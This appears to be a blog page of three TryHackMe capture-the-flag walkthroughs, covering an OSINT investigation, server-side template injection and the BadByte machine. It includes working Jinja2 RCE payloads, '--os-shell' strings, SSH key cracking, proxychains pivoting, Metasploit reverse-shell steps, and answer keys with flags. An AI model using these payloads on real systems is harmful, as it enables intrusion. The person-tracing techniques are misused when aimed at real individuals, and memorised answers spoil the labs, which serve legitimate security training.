Sakura Room

Use a variety of OSINT techniques to solve this room created by the OSINT Dojo.
OSINT Dojo’s Sakura Room walkthrough

Welcome to the OSINT Dojo’s Sakura Room!

Task 2 TIP-OFF

Background

The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear to be any other significant indicators of compromise on any of our systems. However during forensic analysis our admins found an image left behind by the cybercriminals. Perhaps it contains some clues that could allow us to determine who the attackers were?


We've copied the image left by the attacker, you can view it in your browser here.




Instructions


Images can contain a treasure trove of information, both on the surface as well as embedded within the file itself. You might find information such as when a photo was created, what software was used, author and copyright information, as well as other metadata significant to an investigation. In order to answer the following question, you will need to thoroughly analyze the image found by the OSINT Dojo administrators in order to obtain basic information on the attacker.

 open image link and press ctrl+u

 
1) What username does the attacker go by?

Ans :- SakuraSnowAngelAiko

Task 3 RECONNAISSANCE


Background

It appears that our attacker made a fatal mistake in their operational security. They seem to have reused their username across other social media platforms as well. This should make it far easier for us to gather additional information on them by locating their other social media accounts.
Instructions


Most digital platforms have some sort of username field. Many people become attached to their usernames, and may therefore use it across a number of platforms, making it easy to find other accounts owned by the same person when the username is unique enough. This can be especially helpful on platforms such as on job hunting sites where a user is more likely to provide real information about themselves, such as their full name or location information.


A quick search on a reputable search engine can help find matching usernames on other platforms, and there are also a large number of specialty tools that exist for that very same purpose. Keep in mind, that sometimes a platform will not show up in either the search engine results or in the specialized username searches due to false negatives. In some cases you need to manually check the site yourself to be 100% positive if the account exists or not. In order to answer the following questions, use the attacker's username found in Task 2 to expand the OSINT investigation onto other platforms in order to gather additional identifying information on the attacker. Be wary of any false positives!

–>Goto github and search ‘SakuraSnowAngelAiko’ username
 

–>Under that user you will find PGP repo

–>you can copy this code and decode using base64

echo "public key" | base64 -d

Public key Link here :- Click Here

 

1) What is the full email address used by the attacker?

Ans :- SakuraSnowAngel83@protonmail.com

2) What is the attacker's full real name?

Ans :- Aiko Abe

Task 4 UNVEIL

Background

It seems the cybercriminal is aware that we are on to them. As we were investigating into their Github account we observed indicators that the account owner had already begun editing and deleting information in order to throw us off their trail. It is likely that they were removing this information because it contained some sort of data that would add to our investigation. Perhaps there is a way to retrieve the original information that they provided?



Instructions


On some platforms, the edited or removed content may be unrecoverable unless the page was cached or archived on another platform. However, other platforms may possess built-in functionality to view the history of edits, deletions, or insertions. When available this audit history allows investigators to locate information that was once included, possibly by mistake or oversight, and then removed by the user. Such content is often quite valuable in the course of an investigation. In order to answer the below questions, you will need to perform a deeper dive into the attacker's Github account for any additional information that may have been altered or removed. You will then utilize this information to trace some of the attacker's cryptocurrency transactions.

1) What cryptocurrency does the attacker own a cryptocurrency wallet for?

Ans :- Ethereum

--> Scroll down to see repos in which we can see there is a ETH repo

–> Click on this repo
–> Click on miningscript
–> Click on history 

2) What is the attacker's cryptocurrency wallet address?

Ans :- 0xa102397dbeeBeFD8cD2F73A89122fCdB53abB6ef

3) What mining pool did the attacker receive payments from on January 23, 2021 UTC?

Ans :- Ethermine



4) What other cryptocurrency did the attacker exchange with using their cryptocurrency wallet?

Ans :- Tether

Task 5 Taunt

Background

Just as we thought, the cybercriminal is fully aware that we are gathering information about them after their attack. They were even so brazen as to message the OSINT Dojo on Twitter and taunt us for our efforts. The Twitter account which they used appears to use a different username than what we were previously tracking, maybe there is some additional information we can locate to get an idea of where they are heading to next?

We've taken a screenshot of the message sent to us by the attacker, you can view it in your browser here.



Instructions


Although many users share their username across different platforms, it isn't uncommon for users to also have alternative accounts that they keep entirely separate, such as for investigations, trolling, or just as a way to separate their personal and public lives. These alternative accounts might contain information not seen in their other accounts, and should also be investigated thoroughly. In order to answer the following questions, you will need to view the screenshot of the message sent by the attacker to the OSINT Dojo on Twitter and use it to locate additional information on the attacker's Twitter account. You will then need to follow the leads from the Twitter account to the Dark Web and other platforms in order to discover additional information.

1) What is the attacker's current Twitter handle?

Ans :- SakuraLoverAiko

HINT :- 

Not too concerned about someone else finding them on the Dark Web.

Anyone who wants them will have to do a real DEEP search to find where I PASTEd them.

— Aiko (@SakuraLoverAiko) January 24, 2021

--> Open Tor and search deep paste dark web and go to this - Deep web pastebin - Tor Links - onion Links (2021)

--> Click on https://depastedihrn3jtw.onion - DeepPaste, a new extensive site..

2) What is the URL for the location where the attacker saved their WiFi  SSIDs and passwords?

Ans :- http://depastedihrn3jtw.onion/show.php?md5=0a5c6e136a98a60b8a21643ce8c15a74


 

HINT :- wigle.net is a website where we can find wireless network data by using location, name etc. From the above saved screenshot we got exact name of wifi. you can goto wigle and register and login, after that you can do advanced search with the name of wifi.
 

3) What is the BSSID for the attacker's Home WiFi?

Ans :- 84:af:ec:34:fc:f8

Task 6 HOMEBOUND

Background

Based on their tweets, it appears our cybercriminal is indeed heading home as they claimed. Their Twitter account seems to have plenty of photos which should allow us to piece together their route back home. If we follow the trail of breadcrumbs they left behind, we should be able to track their movements from one location to the next back all the way to their final destination. Once we can identify their final stops, we can identify which law enforcement organization we should forward our findings to.



Instructions

In OSINT, there is oftentimes no "smoking gun" that points to a clear and definitive answer. Instead, an OSINT analyst must learn to synthesize multiple pieces of intelligence in order to make a conclusion of what is likely, unlikely, or possible. By leveraging all available data, an analyst can make more informed decisions and perhaps even minimize the size of data gaps. In order to answer the following questions, use the information collected from the attacker's Twitter account, as well as information obtained from previous parts of the investigation to track the attacker back to the place they call home.

1) What airport is closest to the location the attacker shared a photo from prior to getting on their flight?

Ans :- DCA

2) What airport did the attacker have their last layover in?

Ans :- HND

3) What lake can be seen in the map shared by the attacker as they were on their final flight home?

Ans :- Lake Inawashiro

4) What city does the attacker likely consider "home"?

Ans :- Hirosaki

Disclaimer

What is Server Side Template Injection?

Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine.

What is a template engine?

A template engine allows you to create static template files which can be re-used in your application.

What does that mean? Consider a page that stores information about a user, /profile/<user>. The code might look something like this in Python's Flask: 

How is SSTI exploitable?

Consider the above code, specifically the template string. The variable user (which is user input) is concatenated directly into the template, rather than passed in as data. This means whatever is supplied as user input will be interpreted by the engine.

Note: The template engines themselves aren't vulnerable, rather an insecure implementation by the developer.

What is the impact of SSTI?

As the name suggests, SSTI is a server side exploit, rather than client side such as cross site scripting (XSS).

This means that vulnerabilities are even more critical, because instead of an account on the website being hijacked (common use of XSS), the server instead gets hijacked.

You can access the web server by navigating to https://tryhackme.com/room/learnssti

SSTI Payload

• {{ ''.__class__}}
• {{ ''.__init__}}
• {{ ''.__class__.__mro__[1].__subclasses__() }}
• {{ ''.__class__.__mro__[1] }}
• {{ ''.__class__.__mro__[1].__subclasses__()[401] }}
• {{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
• {{'7'*7}}
• jake*' --os-shell
• jake--level 5 -e jade
• ti?user=InjectHere*&comment=A&link" --level 5 -e jade
• ti?user=*&comment=supercomment&link"
• page?name=John*' --os-shell

Note: The endpoint / does not exist, and you will receive a 404 error.

Task 2 Detection

Finding an injection point
The exploit must be inserted somewhere, this is called an injection point.

There are a few places we can look within an application, such as the URL or an input box (make sure to check for hidden inputs).

In this example, there is a page that stores information about a user: http://[IP]:5000/profile/<user>, which takes in user input.

We can find the intended output by providing an expected name:

http://10.10.243.183:5000/profile/jake

Fuzzing

Fuzzing is a technique to determine whether the server is vulnerable by sending multiple characters in hopes to interfere with the backend system.

This can be done manually, or by an application such as BurpSuite's Intruder. However, for educational purposes, we will look at the manual process.

Luckily for us, most template engines will use a similar character set for their "special functions" which makes it relatively quick to detect if it's vulnerable to SSTI.


For example, the following characters are known to be used in quite a few template engines: ${{<%[%'"}}%.


To manually fuzz all of these characters, they can be sent one by one following each other.

The fuzzing process looks as follows:

Continue with this process until you either get an error, or some characters start disappearing from the output.


1) What sequence of characters causes the application to throw an error?

Ans :- {{

Task 3 Identification

Now that we have detected what characters caused the application to error, it is time to identify what template engine is being used.

In the best case scenario, the error message will include the template engine, which marks this step complete!

However, if this is not the case, we can use a decision tree to help us identify the template engine:

To follow the decision tree, start at the very left and include the variable in your request. Follow the arrow depending on the output:

•     Green arrow - The expression evaluated (i.e 42)
•     Red arrow - The expression is shown in the output (i.e ${7*7})

In the case of our example, the process looks as follows:
 

The application mirrors the user input, so we follow the red arrow:

The application evaluates the user input, so we follow the green arrow.

Continue with this process until you get to the end of the decision tree.


1) What template engine is being used in this application?

Ans :- Jinja2

Task 4 Syntax

After having identified the template engine, we now need to learn its syntax.

Where better to learn than the official documentation?

Always look for the following, no matter the language or template engine:

•     How to start a print statement
•     How to end a print statement
•     How to start a block statement
•     How to end a block statement
•     

    

In the case of our example, the documentation states the following:

•     {{ - Used to mark the start of a print statement
•     }} - Used to mark the end of a print statement
•     {% - Used to mark the start of a block statement
•     %} - Used to mark the end of a block statement

1) How do you start a comment in Jinja2?

Ans :- (#

Task 5 Exploitation

At this point, we know:

•     The application is vulnerable to SSTI
•     The injection point
•     The template engine
•     The template engine syntax

Planning


Let's first plan how we would like to exploit this vulnerability.

Since Jinja2 is a Python based template engine, we will look at ways to run shell commands in Python. A quick Google search brings up a blog that details different ways to run shell commands.

I will highlight a few of them below:

Crafting a proof of concept (Generic)


Combining all of this knowledge, we are able to build a proof of concept (POC).

The following payload takes the syntax we acquired from Task 4, and the shells above, and merges them into something that the template engine will accept: http://[IP]:5000/profile/{% import os %}{{ os.system("whoami") }}.


Note: Jinja2 is essentially a sub language of Python that doesn't integrate the import statement, which is why the above does not work.



Crafting a proof of concept (Jinja2)

Python allows us to call the current class instance with .__class__, we can call this on an empty string:

Payload: http://10.10.243.183:5000/profile/{{ ''.__class__ }}.



Classes in Python have an attribute called .__mro__ that allows us to climb up the inherited object tree:

Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__ }}.



Since we want the root object, we can access the second property (first index):

Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1] }}.




Objects in Python have a method called .__subclassess__ that allows us to climb down the object tree:

Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}.



Now we need to find an object that allows us to run shell commands. Doing a Ctrl-F for the modules in the code above yields us a match:

As this whole output is just a Python list, we can access this by using its index. You can find this by either trial and error, or by counting its position in the list.



In this example, the position in the list is 400 (index 401):

Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401] }}.




The above payload essentially calls the subprocess.Popen method, now all we have to do is call it (use the code above for the syntax)

Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}.

Finding payloads

The process to build a payload takes a little while when doing it for the first time, however it is important to understand why it works.


For quick reference, an amazing GitHub repo has been created as a cheatsheet for payloads for all web vulnerabilities, including SSTI.


The repo is located here, while the document for SSTI is located here.
 

1) What is the result of the "whoami" shell command?

Ans:- jake

Task 6 Examination

Now that we've exploited the application, let's see what was actually happening when the payload was injected.


The code that we exploited was the same as shown in Task 1:

Let's imagine this like a simple find and replace.

Refer to the image below to see exactly how this works:

As we learned in Task 4, Jinja2 is going to evaluate code that is in-between those sets of characters, which is why the exploit worked.

Task 7 Remediation

All this hacking begs the question, what can be done to prevent this from happening in the first place?


Sanitisation


User input can not be trusted!

Every place in your application where a user is allowed to add custom content, make sure the input is sanitised!

This can be done by first planning what character set you want to allow, and add these to a whitelist.


In Python, this can be done like so:

Secure methods

Most template engines will have a feature that allows you to pass input in as data, rather that concatenating input into the template.


In Jinja2, this can be done by using the second argument:

Most importantly, remember to read the documentation of the template engine you are using.

Task 8 Case Study

HackerOne Bug Bounty

In March 2016, a user reported an SSTI vulnerability in one of Uber's subdomains. TryHackMe Learn Server Side Termplate Injection

The vulnerability was present within a form that allowed the user to change their profile name. Much like in the example, the user had control over an input which was then reflected back to the user (via email).


Although the user was unable to gain remote code execution, the vulnerability was still present and they were awarded with a $10,000 bounty!


Read the report here.


1) What payload was used to confirm SSTI?

Ans :- {{'7'*7}}

Disclaimer

BadByte 

Badbyte (https://tryhackme.com/room/badbyte) covers many important aspects of penetration testing such as importance of enumeration , hash cracking ,port forwarding , web exploitation and privilege escalation. First of all fire up your pen testing machine and connect to TryHackMe network by OpenVPN. Then deploy the given machine.  TryHackMe Badbyte Infiltrate BadByte and help us to take over root

Reconnaissance

First of all we have to perform a traditional port scan with nmap OR rustscan but we will used nmap. With the following nmap scan, you can get the answers for all 4 questions.



1) How many ports are open?

Ans :- 2 ports are open.

2) What service is running on the lowest open port?

Ans :- Lowest port is 22. So, the service running there is SSH.

3) What non-standard port is open?

Ans :- Only non-standard port we can find is 30024.

4) What service is running on the non-standard port?

Ans :- FTP is running on that port instead of port 21.

Foothold

So, you know that there are FTP and SSH services running on the machine. Let us try to login to FTP as an anonymous user.

 Download note.txt

We can log in to FTP as an anonymous user without specifying a password. When looking around we can see that there are two files named id_rsa and note.txt. Let us download those.

1) What username do we find during the enumeration process?

When looking at the note.txt, we can find out the username as “errorcauser”.

Ans :- errorcauser

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.


To crack ssh private key first use ssh2john python script convert private key to hash (It comes with Kali Linux. Run locate ssh2john).

• python path/to/ssh2john.py privatekey > privatekey.hash
  

Then use john to crack the hash.

• john privatekey.hash -w=/path/to/wordlist

Crack the passphrase of the private key and SSH into the machine. Make sure to change the file permissions of SSH private key to 600.

2. What is the passphrase for the RSA private key?

We come across that the id_rsa file we downloaded is a SSH private key. In order to use this with SSH, we need a passphrase. So, first we need to convert this key into a hash using ssh2john.

Ans :- cupcake



Now, we have the hash of the ssh key. So, We can crack it using JohnTheRipper.
 

we can easily find out the passphrase by cracking it with john’s default wordlist.

Port Forwarding

As we have the passphrase, we can login to ssh using it. We have to set up dynamic port forwarding. However when we try to login, an error is occurred as following.

Remember to provide the above cracked hash as the passphrase. You will be able to easily login as Errorcauser.

Then we have to set up proxychains for the dynamic port forwarding. So, go to the proxychains configuration file which is located at “/etc/proxychains.conf” of your pentesting machine and open it with Nano editor.

Then, make necessary changes. (comment out socks4 127.0.0.1 9050 and add socks5 127.0.0.1 1337 to the end of configuration file)

Then, run a port scan using nmap to enumerate internal ports on the server using proxychains.

After some time, we are given an output like following.

After finding the port of the webserver, perform Local Port Forwarding to that port (port 80) using SSH with the -L flag as following.

Here, remote port is 80(which we found by nmap scan) and the local port is given as 8080. Give the same passphrase we cracked earlier.


1) What main TCP ports are listening on localhost?

From the above result, we can see that apart from the ssh port, ports 80 and 3306 are also open.

Ans :- 80, 3306


2. What protocols are used for these ports?

http and mysql services are running on those ports.


Ans :- http, mysql

Web Exploitation

As port 80 is open, we can come across that there is a web application involved. Just give the IP:PORT combination in your web browser.

 
1) What CMS is running on the machine?

When analyzing the web application, we can come across that it is developed using Wordpress.

Ans :- wordpress

2. Can you find any vulnerable plugins?
You can use wordpress enumeration nmap script to find the plugins.

Ans :- No answer needed

We are given an output as follows as the result of above enumeration.

I just Googled the plugins for vulnerabilities and found the answers for the following questions.

3. What is the CVE number for directory traversal vulnerability?

Ans :- CVE-2020-11738

4. What is the CVE number for remote code execution vulnerability?

Ans :- CVE-2020-25213

5. There is a metasploit module for the exploit. You can use it to get the reverse shell.

In msfconsole search for a relevant exploit. I found it easily as follows.

You have to set rhost as 127.0.0.1 ,rport as 8080 , lhost as your tun0 IP and run the exploit. If everything is fine, you will be prompted with the meterpreter session.

6. What is the name of user that was running CMS?

Give the command “whoami” and you will be able to find the username.

Ans :-  cth

7. What is the user flag?

In the user’s home directory, you can find the user flag.

Ans :-  THM{227906201d17d9c45aa93d0122ea1af7}

Privilege Escalation

As for now, we have a low privileged shell. But, we need to escalate our privileges in order to obtain the root flag.

1) What is the user’s old password?

When browsing the file system for a little bit, you can come across that the log file, /var/log/bash.log can be accessed by the user, without requiring password. Just “cat” the log file and you can find the password there.

Ans :-  G00dP@$sw0rd2020

Make the user, a superuser. Then you may need to change some directories, in order to get to root’s home.


Then you can obtain the root flag as follows.

2) What is the root flag?

You have to guess the new password of the user, in order to get the root flag. As we must use SSH, we must need the new password. It is very easy to guess.(Hint: Old password was configured last year and now we are not in last year. Isn’t it?) After guessing the new password, we can ssh as the new user.

Ans :- THM{ad485b44f63393b6a9225974909da5fa}

Disclaimer